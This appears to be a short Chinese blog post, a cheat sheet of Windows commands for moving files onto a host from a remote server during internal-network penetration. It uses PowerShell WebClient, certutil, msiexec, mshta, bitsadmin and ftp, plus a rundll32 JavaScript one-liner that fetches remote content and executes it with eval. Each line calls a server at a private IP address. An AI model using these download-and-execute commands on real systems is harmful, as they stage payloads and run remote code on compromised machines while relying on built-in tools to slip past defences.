內網-檔案上傳與下載
阿新 • • 發佈:2021-02-08
技術標籤:內網基礎
powershell
(new-object Net.WebClient).DownloadFile('http://192.168.174.130/ip.txt','C:\ip.txt')
certutil
Certutil –urlcache –split –f http://192.168.174.130:8000/ip.txt
msiexec
Msiexec /q /i http://192.168.3.1/test.txt
mshta
Mshta http://192.168.174.130:8000/ip.txt
rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.174.130:8000/ip.txt",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%
bitsadmin
bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.174.130:8000/ip.txt" "c:\ip.txt"
ftp上傳
ftp
ftp>open ip:port
ftp>username
ftp>password
ftp>get target.exe